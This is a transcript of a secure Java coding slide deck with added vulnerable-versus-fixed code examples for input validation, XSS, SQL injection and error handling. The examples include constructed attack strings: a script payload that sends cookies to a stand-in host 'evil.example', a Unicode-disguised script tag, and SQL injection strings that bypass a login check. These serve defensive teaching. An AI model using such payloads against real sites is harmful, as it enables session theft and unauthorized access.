Web app security

Published in: Technology
  • OWASP Top 10 Web Application Security Risks for 2010 are:
    • A1: Injection
    • A2: Cross-Site Scripting (XSS)
    • A3: Broken Authentication and Session Management
    • A4: Insecure Direct Object References
    • A5: Cross-Site Request Forgery (CSRF)
    • A6: Security Misconfiguration
    • A7: Insecure Cryptographic Storage
    • A8: Failure to Restrict URL Access
    • A9: Insufficient Transport Layer Protection
    • A10: Unvalidated Redirects and Forwards
  • Transcript

    • 1. Secure Java Coding Practices Araf Karsh Hamid June, 2006
    • 2. Agenda
      • Rich Internet Applications: History; Architecture; Nothing New
      • Security: Threats, Vulnerabilities & Defense; Web Application Firewalls; Web Application Security Concerns
      • Secure Java Coding Practices
    • 3. Rich Internet Apps – History
    • 4. Rich Internet Apps – AJAX vs. Traditional Web Applications
    • 5. Security – Threats, Vulnerabilities & Defense; Web Application Firewalls; Web Application Security Concerns
    • 6. Threats, Vulnerabilities & Defense
    • 7. Web Security – Web Application Firewalls
    • 8. Web Application Security & Secure Java Coding Practices
    • 9. Top 10 Web Vulnerabilities
      • 1. Unvalidated Inputs
      • 2. Cross-Site Scripting (XSS)
      • 3. Injection Flaws
      • 4. Improper Error Handling
      • 5. Broken Authentication and Session Management
      • 6. Insecure Direct Object References
      • 7. Cross-Site Request Forgery (CSRF)
      • 8. Security Misconfiguration
      • 9. Insecure Cryptographic Storage
      • 10. Failure to Restrict URL Access
      • 11. Insufficient Transport Layer Protection
    • 10. Un-validated Input
      • The attacker can change any value of the input submitted to the web server (form fields, hidden fields, cookies, headers); client-side checks are a usability aid, not a control.
      • Re-validate all inputs at the server.
      • Take only the information the server actually needs from a form submission; anything else (for example a hidden price field) should be recomputed server-side, not read back from the client.
    • 11. Un-validated Input (Problem)
    • 12. Unvalidated Input (Fixed)
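The Problem/Fixed slides above were code screenshots that did not survive the transcript. The following is an added example written for this page (not the presenter's code) of the same point: an order total computed from a form. The product catalogue, SKU format, quantity limits and request maps are constructed sample data.

```java
import java.util.HashMap;
import java.util.Map;
import java.util.regex.Pattern;

/** Added example (not from the original slides): trusting client-supplied form
 *  data vs. re-validating it on the server. All data here is constructed. */
public class OrderInput {

    // Server-side catalogue: the only trustworthy source of prices (assumed data).
    private static final Map<String, Integer> PRICE_CENTS = new HashMap<>();
    static {
        PRICE_CENTS.put("SKU-1001", 1999);
        PRICE_CENTS.put("SKU-2002", 4999);
    }

    // Allow-list for the one identifier we accept from the client (assumed format).
    private static final Pattern SKU = Pattern.compile("^SKU-\\d{4}$");

    /** Vulnerable: trusts the hidden "price" field and parses the quantity blindly.
     *  The attacker edits the form and submits price=1, a negative qty, etc. */
    static int totalUnsafe(Map<String, String> form) {
        int price = Integer.parseInt(form.get("price"));   // client-controlled
        int qty   = Integer.parseInt(form.get("qty"));     // may be negative or huge
        return price * qty;
    }

    /** Fixed: take only what the server needs from the form (SKU and quantity),
     *  validate each field, and look the price up server-side. */
    static int totalSafe(Map<String, String> form) {
        String sku = form.get("sku");
        if (sku == null || !SKU.matcher(sku).matches()) {
            throw new IllegalArgumentException("invalid sku");
        }
        Integer price = PRICE_CENTS.get(sku);
        if (price == null) {
            throw new IllegalArgumentException("unknown sku");
        }
        int qty;
        try {
            qty = Integer.parseInt(form.getOrDefault("qty", ""));
        } catch (NumberFormatException e) {
            throw new IllegalArgumentException("qty is not a number");
        }
        if (qty < 1 || qty > 100) {                 // business-rule range check
            throw new IllegalArgumentException("qty out of range");
        }
        // Any "price" field the client sent is ignored, even if present.
        return Math.multiplyExact(price, qty);     // fail loudly instead of overflowing
    }

    public static void main(String[] args) {
        Map<String, String> tampered = new HashMap<>();   // constructed request
        tampered.put("sku", "SKU-2002");
        tampered.put("price", "1");       // attacker edited the hidden field
        tampered.put("qty", "3");

        System.out.println("unsafe total (cents): " + totalUnsafe(tampered));
        System.out.println("safe total (cents):   " + totalSafe(tampered));

        tampered.put("qty", "-3");        // negative quantity -> refund to attacker
        try {
            totalSafe(tampered);
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The validation is deliberately an allow-list (pattern, type, range) rather than a search for bad characters; a deny-list has to anticipate every encoding an attacker might use, an allow-list does not.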
    • 13. Cross Site Scripting
      • Attacker injects script into the input data, which is later reflected or stored and rendered to other users' browsers.
      • Malicious code can be hidden with Unicode (look-alike or full-width characters that a naive filter does not recognise).
      • Counter measures: input validation; input length check.
    • 14. Cross Site Scripting (Problem)
    • 15. Cross Site Scripting (Fixed)
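As an added example for the XSS slides (not the presenter's code), the snippet below reflects a user-supplied name into HTML twice: unencoded, and after validation plus output encoding. The small entity encoder is written out here only so the example has no dependencies; the payload strings and the name format are constructed.

```java
import java.text.Normalizer;

/** Added example (not from the original slides): reflecting user input into
 *  HTML with and without validation and output encoding. */
public class GreetingPage {

    /** Vulnerable: user input is concatenated straight into the markup. */
    static String renderUnsafe(String name) {
        return "<p>Welcome, " + name + "!</p>";
    }

    /** Minimal HTML entity encoder for element content. In production use a
     *  maintained library (for example the OWASP Java Encoder); this hand-written
     *  version exists only to keep the example self-contained. */
    static String htmlEncode(String s) {
        StringBuilder sb = new StringBuilder(s.length());
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;
                case '/':  sb.append("&#47;");  break;
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    /** Fixed: normalise Unicode before validating (so look-alike characters cannot
     *  hide a tag from the filter), bound the length, allow-list the characters,
     *  and still encode on output. Allowed name characters are an assumption. */
    static String renderSafe(String name) {
        String normalised = Normalizer.normalize(name, Normalizer.Form.NFKC);
        if (normalised.length() > 40) {
            throw new IllegalArgumentException("name too long");
        }
        if (!normalised.matches("[\\p{L}\\p{M} .'-]+")) {
            throw new IllegalArgumentException("name contains disallowed characters");
        }
        return "<p>Welcome, " + htmlEncode(normalised) + "!</p>";
    }

    public static void main(String[] args) {
        // Constructed payloads.
        String payload = "<script>document.location='http://evil.example/?c='+document.cookie</script>";
        // Full-width '<' (U+FF1C) and '>' (U+FF1E) normalise to ASCII '<' and '>'
        // under NFKC; a filter that runs before normalisation would miss them.
        String hidden = "\uFF1Cscript\uFF1Ealert(1)\uFF1C/script\uFF1E";

        System.out.println(renderUnsafe(payload));
        for (String s : new String[] { payload, hidden, "O'Brien" }) {
            try {
                System.out.println(renderSafe(s));
            } catch (IllegalArgumentException e) {
                System.out.println("rejected: " + e.getMessage());
            }
        }
    }
}
```

Note that the encoding is specific to HTML element content; a value placed into an attribute, a URL or a script block needs the encoder for that context, which is why the validation step is kept even though the output is encoded.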
    • 16. SQL Injection
      • Attacker: can inject system commands; can inject other SQL; can override access checks.
      • Examples: add more commands (“; select * from users;”); override access (“’ OR 1=1;”).
      • Counter measures: use prepared statements in SQL; run with limited privileges; filter / validate the input.
    • 17. SQL Injection (Problem)
    • 18. SQL Injection (Fixed)
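As an added example for the SQL injection slides (not the presenter's code), the class below builds a login query by string concatenation and then shows the same lookup as a PreparedStatement. The `users` table, its columns and the sample inputs are assumed; the password column is compared in clear only to keep the query short.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

/** Added example (not from the original slides): a login lookup built by
 *  string concatenation vs. the same query with bound parameters. */
public class UserLookup {

    /** Vulnerable: the query text is assembled from user input, so input can
     *  change the structure of the statement, not just its values. */
    static String buildUnsafeQuery(String user, String pass) {
        return "SELECT id FROM users WHERE name = '" + user
             + "' AND password = '" + pass + "'";
    }

    static boolean loginUnsafe(Connection db, String user, String pass) throws SQLException {
        try (Statement st = db.createStatement();
             ResultSet rs = st.executeQuery(buildUnsafeQuery(user, pass))) {
            return rs.next();
        }
    }

    /** Fixed: the SQL text is fixed before any user input is seen; the driver
     *  sends the inputs as data, so a quote in the name is just a quote. */
    static boolean loginSafe(Connection db, String user, String pass) throws SQLException {
        String sql = "SELECT id FROM users WHERE name = ? AND password = ?";
        try (PreparedStatement ps = db.prepareStatement(sql)) {
            ps.setString(1, user);
            ps.setString(2, pass);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next();
            }
        }
    }

    public static void main(String[] args) {
        // Constructed inputs; printed so the effect is visible without a database.
        System.out.println(buildUnsafeQuery("alice", "secret"));
        // Override the access check: the password clause is commented away and
        // OR 1=1 is true for every row.
        System.out.println(buildUnsafeQuery("' OR 1=1; --", "anything"));
        // Stacked statement: drivers that allow multiple statements run both.
        System.out.println(buildUnsafeQuery("x'; SELECT * FROM users; --", "anything"));
    }
}
```

The second counter measure on the slide, running with limited privileges, is independent of the code: the account the application uses to connect should hold only the rights the queries need (here, SELECT on `users`), so that even a successful injection cannot drop tables or reach other schemas.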
    • 19. Improper Error Handling
      • Attacker gets system information and database information from error output.
      • Examples: stack (thread) traces; database dump.
      • Counter measures: sanitize the error message; avoid sending stack traces to the end user; customize error pages (HTTP errors 404 etc.).
    • 20. Improper Error Handling (Problem)
    • 21. Improper Error Handling (Fixed)
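As an added example for the error-handling slides (not the presenter's code), the class below shows a handler that returns the exception text and stack trace to the user next to one that logs the detail server-side under a reference ID and returns a generic message. The `Response` type, the failing `loadAccount` call and the connection string in its message are constructed stand-ins for a real servlet and data layer.

```java
import java.io.PrintWriter;
import java.io.StringWriter;
import java.util.UUID;
import java.util.logging.Level;
import java.util.logging.Logger;

/** Added example (not from the original slides): leaking internals through an
 *  error page vs. logging them server-side and returning a correlation ID. */
public class ErrorHandling {

    private static final Logger LOG = Logger.getLogger(ErrorHandling.class.getName());

    /** Stand-in for a page response: status code and body. */
    static final class Response {
        final int status;
        final String body;
        Response(int status, String body) { this.status = status; this.body = body; }
        @Override public String toString() { return status + "\n" + body; }
    }

    /** Stand-in for a data-access call; the message is constructed and is the
     *  kind of detail (host, schema, DB user) that should never reach a browser. */
    static String loadAccount(String id) {
        throw new IllegalStateException(
            "Connection refused: jdbc:mysql://db-prod-03:3306/bank (user=app_rw)");
    }

    /** Vulnerable: exception text and stack trace go straight to the user,
     *  revealing hosts, class names, framework versions and code paths. */
    static Response handleUnsafe(String id) {
        try {
            return new Response(200, loadAccount(id));
        } catch (RuntimeException e) {
            StringWriter sw = new StringWriter();
            e.printStackTrace(new PrintWriter(sw));
            return new Response(500, "Error: " + e.getMessage() + "\n" + sw);
        }
    }

    /** Fixed: the full detail is logged server-side under a reference ID and the
     *  user receives a generic message carrying only that ID. */
    static Response handleSafe(String id) {
        try {
            return new Response(200, loadAccount(id));
        } catch (RuntimeException e) {
            String ref = UUID.randomUUID().toString();
            LOG.log(Level.SEVERE, "request failed, ref=" + ref, e); // trace stays in the log
            return new Response(500,
                "Sorry, something went wrong. Quote reference " + ref + " to support.");
        }
    }

    public static void main(String[] args) {
        System.out.println(handleUnsafe("42"));
        System.out.println("----");
        System.out.println(handleSafe("42"));
    }
}
```

The same rule applies to errors the container raises before the application sees them: a default 404 or 500 page typically names the server software, so in a servlet application the `<error-page>` element in web.xml (keyed by `<error-code>` or `<exception-type>`) should route those to a custom page that says nothing about the stack.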
    • 22. Questions?